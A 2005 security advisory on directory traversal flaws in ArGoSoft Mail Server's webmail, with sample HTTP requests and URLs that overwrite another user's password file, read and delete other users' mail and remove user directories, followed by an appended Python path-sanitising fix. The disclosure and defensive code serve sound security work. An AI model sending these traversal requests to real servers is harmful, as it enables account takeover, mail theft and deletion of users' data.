
| Subject: | [NT] ArGoSoft Mail Server Webmail Multiple Directory Traversal Vulnerabilities |
|---|---|
| Date: | 24 Feb 2005 16:47:06 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

ArGoSoft Mail Server Webmail Multiple Directory Traversal Vulnerabilities
------------------------------------------------------------------------

SUMMARY

"<http://www.argosoft.com/mailserver/> ArGoSoft Mail Server is a fully functional SMTP/POP3/Finger (Pro version also has IMAP module) server for Windows 95/98/NT/2000, which will let you turn your computer into the email system. It's very compact, takes about 1-5 Mb of disk space (depending on the version), does not have any specific memory requirements, and what is the most important - it's very easy to use."

Multiple directory traversal vulnerabilities were found in ArGoSoft Mail Server's Webmail that may be exploited by an authenticated mail user to upload files to arbitrary directories on the server, retrieve arbitrary files from the server, access other users' emails, and create/delete arbitrary directories on the server.

DETAILS

Vulnerable Systems:
 * ArGoSoft Mail Server version 1.8.7.3

Directory Traversal in Email Attachment Filename:

ArGoSoft Mail Server's Webmail allows an authenticated mail user to upload file attachments when composing an email. Lack of input validation of the supplied filename allows the user to upload files to arbitrary locations on the server. This may be exploited by a malicious mail user to upload and replace other users' password file (userdata.rec) with a copy that has a known password, thus allowing him/her to authenticate as other users.

A sample malicious file upload HTTP request is shown below:

```http
POST /attachfile HTTP/1.0
Host: localhost
Cookie: ams-auth=XXXXXXXXXXXXX
Content-Type: multipart/form-data; boundary=---------------------------24242261923581
Content-Length: 456
Connection: Close

-----------------------------24242261923581
Content-Disposition: form-data; name="x"

52
-----------------------------24242261923581
Content-Disposition: form-data; name="y"

10
-----------------------------24242261923581
Content-Disposition: form-data; name="attfile"; filename="../../test2/userdata.rec"
Content-Type: application/octet-stream

__VER__1.8.7.3
XXXXXXXX
test2
test2
0
1
0
-----------------------------24242261923581--
```

Directory Traversal in _msgatt.rec:

When the Webmail user is composing an email, all attachments uploaded for that email will be saved in the following temporary directory:

```text
C:\Program Files\ArGo Software Design\Mail Server\_users\_nodomain\username\_tempatt\
```

A sample listing of this directory is shown below:

```text
 Directory of C:\Program Files\ArGo Software Design\Mail Server\_users\_nodomain\test\_tempatt

02/09/2005  08:18p    <DIR>          .
02/09/2005  08:18p    <DIR>          ..
02/09/2005  08:17p                90 inbox.msl
02/09/2005  08:18p               167 TESTFILE.txt      // file attachment uploaded by user
02/09/2005  08:18p                13 _msgatt.rec
02/09/2005  08:18p                 0 _msgbody.rec
02/09/2005  08:18p               136 _msgdata.rec
               5 File(s)            406 bytes
```

The server will create the file (_msgatt.rec) in this temporary directory. This file contains the filename of all file attachments that the user has uploaded while composing the current email. The user can control the contents of this file by uploading a file attachment with the same filename as this server-generated file. The user-uploaded copy will replace the one generated by the server. By uploading a specially crafted _msgatt.rec containing directory traversal characters, it is possible to cause the server to send any arbitrary file on the server as an attachment to the user.

A malicious user may exploit this vulnerability to email other users' password file (userdata.rec) to himself. A sample malicious _msgatt.rec file is shown below:

```text
./../test2/userdata.rec
```

This malicious file, when uploaded as an attachment and saved to the temporary directory, will contain two additional lines of server-generated entries as shown below:

```text
./../test2/userdata.rec
-
_msgatt.rec
```

To ensure that the email can be sent correctly, the malicious user must "detach" the last two files (i.e. "-" and "_msgatt.rec"). This can be trivially done via the web interface. Subsequently, when the user retrieves his email via IMAP, he'll be able to receive test2's userdata.rec file as an attachment.

Directory Traversal in /msg and /delete Folder Parameter:

The /msg link allows the Webmail user to view his/her emails. The full URL is:

```text
http://[hostname]/msg?MsgNo=0&Folder=inbox&UIDL=sjo2z7plfizwvu3x
```

It is possible to view other users' email by using directory traversal characters in the Folder parameter and specifying a correct UIDL. The UIDL uniquely identifies the email, and guessing the UIDL of another user's email is impractical. However, it is possible to obtain a list of the UIDLs of another user's emails by surfing to the following link while being authenticated. Note that inbox.msl only exists if the other user is currently authenticated, i.e. the server will create inbox.msl in every user's temporary directory (see the _msgatt.rec vulnerability above) only after he/she has authenticated.

```text
http://[hostname]/_users/_nodomain/other_username/_tempatt/inbox.msl
```

Sample contents shown below:

```text
j18mspvyiitdzxdw
zrr77aepklpadkv5
nuczv11pjysmrceu
10zptzip5g8ejlwx
ymufn1briuvp2ocu
```

It is then possible to retrieve the other user's emails using the following link:

```text
http://[hostname]/msg?MsgNo=0&Folder=../other_username/inbox&UIDL=j18mspvyiitdzxdw
```

The /delete link, which allows the user to delete his/her own emails, is similarly vulnerable. A sample malicious POST request to /delete is shown below; this will delete mails belonging to user test2.

```http
POST /delete HTTP/1.0
Host: localhost
Cookie: ams-auth=XXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: Close

x=36&y=11&sel=0&act=1&folderselect=&j18mspvyiitdzxdw=on&Folder=../test2/inbox
```

Creating or Deleting Arbitrary Directories on the Server:

Directory traversal in the /folderadd and /folderdelete "Folder" parameter allows creating/deleting arbitrary directories on the server. The /folderadd and /folderdelete links allow the Webmail user to create/delete mail folders. It is possible to use directory traversal characters in the Folder parameter to create/delete directories in arbitrary locations on the server. A malicious user may exploit this vulnerability to delete other users' entire mail directories, which is effectively the same as removing the users from the system. The following will totally remove user test2 from the system:

```text
http://[hostname]/folderdelete?Folder=../test2
```

Disclosure Timeline:
 * 06/02/05 - Vulnerability Discovered.
 * 08/02/05 - Initial Vendor Notification.
 * 08/02/05 - Received Notification from Vendor that Fixed Version was Released.
 * 09/02/05 - Public Release.

Vendor Status:
Vulnerability fixed. Patch for vulnerable version released.

ADDITIONAL INFORMATION

The information has been provided by <mailto:chewkeong@security.org.sg> Tan Chew Keong.
The original article can be found at: <http://www.security.org.sg/vuln/argosoftmail1873.html>

========================================
This bulletin is sent to members of the SecuriTeam mailing list.
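All four issues in this advisory share one root cause: a user-supplied path fragment (the multipart `filename`, the contents of `_msgatt.rec`, the `Folder` parameter) is joined onto a per-user directory without confining the result to that directory. The Python below is an added example, not code from the advisory or from ArGoSoft, of the two checks a server-side fix needs: reduce an upload name to a bare basename that cannot collide with server-generated files, and resolve a `Folder` value against the mailbox root and refuse anything that lands outside it (or on the root itself, which is what an empty `Folder` to `/folderdelete` would hit). The base directory, function names and sample values are constructed for the example; the reserved-name list is taken from the directory listing above.

```python
"""Defensive handling of the user-controlled path inputs named in the advisory:
the multipart upload filename and the Folder parameter. The base directory,
function names and sample values are constructed assumptions, not ArGoSoft code."""
import posixpath
from urllib.parse import unquote

# Server-generated files inside a user's mailbox that an upload must never
# replace. _msgatt.rec is the one the advisory abuses; the others appear in
# the advisory's directory listing.
RESERVED_NAMES = frozenset(
    {"_msgatt.rec", "_msgbody.rec", "_msgdata.rec", "inbox.msl", "userdata.rec"}
)


class TraversalError(ValueError):
    """Raised when user input would escape, or clobber, the per-user directory."""


def _decode(raw: str) -> str:
    # Decode twice so a double-encoded %252e%252e does not survive one pass,
    # then treat Windows and POSIX separators alike (the server runs on Windows).
    text = unquote(unquote(raw))
    if "\x00" in text:
        raise TraversalError("NUL byte in path")
    return text.replace("\\", "/")


def safe_attachment_name(raw_filename: str) -> str:
    """Reduce a multipart filename="..." value to a bare basename.

    Dropping every directory component means '../../test2/userdata.rec' can
    only land in the caller's own _tempatt directory, and the reserved-name
    check stops a user-supplied _msgatt.rec from replacing the server's copy.
    """
    name = posixpath.basename(_decode(raw_filename))
    if name in ("", ".", ".."):
        raise TraversalError(f"unusable attachment name {raw_filename!r}")
    if name.lower() in RESERVED_NAMES:  # Windows filenames are case-insensitive
        raise TraversalError(f"{name!r} would replace a server-generated file")
    return name


def safe_folder_path(base_dir: str, raw_folder: str) -> str:
    """Resolve a Folder= value under base_dir, refusing anything that leaves it.

    Intended for /msg, /delete, /folderadd and /folderdelete alike: the
    decisive check is on the resolved path, not merely on the presence of '..'.
    """
    folder = _decode(raw_folder)
    if posixpath.isabs(folder) or (len(folder) > 1 and folder[1] == ":"):
        raise TraversalError(f"absolute path in Folder: {raw_folder!r}")
    if ".." in folder.split("/"):
        raise TraversalError(f"parent reference in Folder: {raw_folder!r}")
    base = posixpath.normpath(base_dir)
    full = posixpath.normpath(posixpath.join(base, folder))
    if posixpath.commonpath([base, full]) != base:
        raise TraversalError(f"Folder {raw_folder!r} escapes {base_dir}")
    if full == base:
        # An empty Folder would make /folderdelete remove the whole mailbox.
        raise TraversalError("Folder must name a subdirectory")
    return full


def rejects(check, *args) -> bool:
    """True if check(*args) raises TraversalError; used by the demo below."""
    try:
        check(*args)
    except TraversalError:
        return True
    return False


if __name__ == "__main__":
    # Constructed stand-in for C:\...\_users\_nodomain\test on the Windows host.
    base = "/srv/ams/_users/_nodomain/test"
    for value in ("TESTFILE.txt", "../../test2/userdata.rec", "_msgatt.rec"):
        verdict = "REJECT" if rejects(safe_attachment_name, value) else "ok"
        print(f"upload {value!r:32} -> {verdict}")
    for value in ("inbox", "../other_username/inbox", "../test2", "..%2Ftest2%2Finbox", ""):
        verdict = "REJECT" if rejects(safe_folder_path, base, value) else "ok"
        print(f"Folder {value!r:32} -> {verdict}")
```

The `commonpath` comparison is the check that matters; the earlier `..` scan only exists to give a clearer error. Note that `safe_attachment_name` deliberately accepts `../../test2/report.txt` by returning `report.txt`: the traversal is neutralised rather than reported, which is the right behaviour for an upload endpoint, whereas a `Folder` value is rejected outright because it names a location the user intends to act on.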